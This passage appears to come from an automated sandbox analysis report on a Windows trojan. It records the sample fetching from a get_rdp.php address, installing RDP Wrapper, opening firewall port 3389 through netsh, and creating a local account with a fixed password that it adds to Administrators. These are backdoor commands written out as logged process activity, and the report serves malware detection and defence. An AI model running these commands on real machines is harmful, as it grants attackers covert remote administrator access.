                        Source: RDPWInst.exe, RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://stascorp.com/load/1-1-0-62
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.3.drString found in binary or memory: http://stascorp.comDVarFileInfo$
                        Source: Amcache.hve.27.drString found in binary or memory: http://upx.sf.net
                        Source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/
                        Source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yalubluseks.eu
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yalubluseks.eud
                        Source: RDPWInst.exeString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                        Source: RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeString found in binary or memory: https://yalubluseks.eu/get_rdp.php
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_rdp.phpd
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040360C3_2_0040360C
                        Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00406BE0 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00404CDC appears 74 times
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00407450 appears 135 times
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 004042F8 appears 74 times
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPCreator.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerfxvmt.dllj% vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPWInst.exeB vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.00000000011CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000000.1664658414.0000000000BA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRDPCreator.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeBinary or memory string: OriginalFilenameRDPCreator.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                        Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@29/11@2/3
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,3_2_0043BF00
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040FAE8 GetDiskFreeSpaceW,3_2_0040FAE8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,3_2_0043DC64
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,3_2_0043B1A8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP WrapperJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6468
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to behavior
                        Source: Yara matchFile source: 3.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1688644177.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeReversingLabs: Detection: 44%
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeVirustotal: Detection: 58%
                        Source: RDPWInst.exeString found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeString found in binary or memory: /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_217d5074 DUF6g)aA2aiB /add
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_217d5074 /add
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroupJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
